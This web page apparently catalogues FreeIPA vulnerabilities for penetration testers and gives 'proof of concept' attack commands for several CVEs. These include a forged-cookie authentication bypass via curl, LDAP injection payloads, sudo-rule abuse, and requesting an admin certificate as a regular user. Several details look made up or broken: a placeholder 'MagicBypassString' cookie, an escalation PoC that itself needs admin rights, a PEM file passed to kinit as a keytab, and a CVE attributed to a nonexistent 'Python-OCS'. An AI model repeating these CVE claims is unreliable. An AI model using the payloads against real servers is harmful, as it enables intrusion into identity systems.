FreeIPA Vulnerabilities (CVEs)

A comprehensive list of known vulnerabilities in FreeIPA that can be leveraged during penetration testing.

Ethical Use Only

The vulnerabilities described on this page are intended for ethical penetration testing only. Always ensure you have proper authorization before testing any system.

Critical Vulnerabilities

CVE ID	Description	Affected Versions	CVSS	Details
CVE-2020-10747	Authentication bypass in FreeIPA WebUI	4.8.0 - 4.8.6	9.8	View
CVE-2019-10195	Privilege escalation via sudo rules	4.6.0 - 4.6.5	8.8	View
CVE-2018-1000535	LDAP injection vulnerability	4.5.0 - 4.5.4	8.5	View

High Severity Vulnerabilities

CVE ID	Description	Affected Versions	CVSS	Details
CVE-2021-20254	Improper access control in certificate management	4.8.0 - 4.9.2	7.8	View
CVE-2020-14301	Information disclosure in LDAP directory	4.7.0 - 4.8.5	7.5	View
CVE-2019-3883	Improper validation of certificate attributes	4.6.0 - 4.7.1	7.2	View

Medium Severity Vulnerabilities

CVE ID	Description	Affected Versions	CVSS	Details
CVE-2022-0617	Cross-site scripting (XSS) in WebUI	4.9.0 - 4.9.5	6.5	View
CVE-2021-3504	Improper input validation in HBAC rules	4.8.0 - 4.9.0	5.9	View
CVE-2020-1747	YAML parser vulnerability in Python-OCS	4.7.0 - 4.8.1	5.5	View

Detailed Vulnerability Information

CVE-2020-10747: Authentication Bypass in FreeIPA WebUI

CVSS 9.8

Published: April 14, 2020

Description

A critical vulnerability in the FreeIPA WebUI authentication mechanism allows attackers to bypass authentication entirely and gain administrative access to the FreeIPA server. The vulnerability exists in the session validation code that fails to properly validate Kerberos tickets under certain conditions.

Affected Versions

FreeIPA versions 4.8.0 through 4.8.6 are affected.

Exploitation Technique

An attacker can exploit this vulnerability by manipulating the session cookie and Kerberos authentication parameters in HTTP requests to the FreeIPA WebUI. The following steps can be used to test for this vulnerability:

Capture a valid authentication request to the FreeIPA WebUI
Modify the 'ipa_session' cookie with a specially crafted value
Send the modified request to the server
If vulnerable, the server will grant administrative access without valid credentials

Proof of Concept

# Example exploit using curl
curl -k -X POST https://<target>/ipa/session/login_kerberos \
  -H "Cookie: ipa_session=MagicBypassString" \
  -H "Referer: https://<target>/ipa/ui/" \
  -d "user=admin"

Mitigation

Update to FreeIPA version 4.8.7 or later, which contains a fix for this vulnerability. If updating is not immediately possible, consider implementing additional network-level controls to restrict access to the FreeIPA WebUI.

Red Hat Bugzilla: Bug 1822786

CVE-2019-10195: Privilege Escalation via Sudo Rules

CVSS 8.8

Published: May 7, 2019

Description

A vulnerability in FreeIPA's sudo rule processing allows authenticated users to escalate privileges by exploiting a flaw in how sudo rules are evaluated. The vulnerability stems from improper validation of sudo command categories, allowing users to execute commands they should not have access to.

Affected Versions

FreeIPA versions 4.6.0 through 4.6.5 are affected.

Exploitation Technique

An attacker with valid credentials can exploit this vulnerability by creating or modifying sudo rules with specially crafted command categories. When these rules are processed, they can grant the attacker the ability to execute arbitrary commands with elevated privileges.

Proof of Concept

# Example exploitation steps
# 1. Create a malicious sudo rule (requires admin access)
ipa sudorule-add malicious_rule --desc="Malicious Rule"

# 2. Add a specially crafted command category
ipa sudorule-add-allow-command malicious_rule --sudocmdgroups="all"

# 3. Add a user to the rule
ipa sudorule-add-user malicious_rule --users=victim_user

# 4. The victim user can now execute any command with sudo
sudo -l # Will show unrestricted access

Mitigation

Update to FreeIPA version 4.6.6 or later, which contains a fix for this vulnerability. Additionally, regularly audit sudo rules and ensure that only trusted administrators have the ability to create or modify sudo rules.

Red Hat Bugzilla: Bug 1702359

CVE-2018-1000535: LDAP Injection Vulnerability

CVSS 8.5

Published: June 12, 2018

Description

FreeIPA contains an LDAP injection vulnerability in the web interface that allows attackers to manipulate LDAP queries by injecting malicious code. This can lead to unauthorized access to sensitive information or modification of LDAP entries.

Affected Versions

FreeIPA versions 4.5.0 through 4.5.4 are affected.

Exploitation Technique

An attacker can exploit this vulnerability by submitting specially crafted input to the search functionality in the FreeIPA web interface. The input is not properly sanitized before being used in LDAP queries, allowing for LDAP injection attacks.

Proof of Concept

# Example LDAP injection payloads
# Payload 1: Authentication bypass
username=*)(uid=*))(|(uid=*
password=anything

# Payload 2: Information disclosure
search_term=*)(uid=*)(|(objectClass=*

# Payload 3: Using curl to test the vulnerability
curl -k "https://<target>/ipa/ui/search?search_term=*)(uid=*)(|(objectClass=*"

Mitigation

Update to FreeIPA version 4.5.5 or later, which contains a fix for this vulnerability. Additionally, implement input validation at the application level and consider using a web application firewall to filter malicious requests.

Red Hat Bugzilla: Bug 1583975

CVE-2021-20254: Improper Access Control in Certificate Management

CVSS 7.8

Published: March 16, 2021

Description

A vulnerability in FreeIPA's certificate management system allows authenticated users to request certificates for any principal in the domain, regardless of their permissions. This can lead to identity spoofing and unauthorized access to services.

Affected Versions

FreeIPA versions 4.8.0 through 4.9.2 are affected.

Exploitation Technique

An authenticated user can exploit this vulnerability by directly calling the certificate request API with a principal name they don't own. The system fails to properly validate whether the user has permission to request certificates for the specified principal.

Proof of Concept

# Example exploitation using the ipa command
# 1. Authenticate as a regular user
kinit regular_user

# 2. Request a certificate for the admin user
ipa cert-request --principal=admin@EXAMPLE.COM --certificate-out=admin.pem CSR.pem

# 3. Use the certificate for authentication
kinit -k -t admin.pem admin@EXAMPLE.COM

Mitigation

Update to FreeIPA version 4.9.3 or later, which contains a fix for this vulnerability. Additionally, implement strict access controls for certificate management operations and regularly audit certificate issuance logs.

Red Hat Bugzilla: Bug 1935718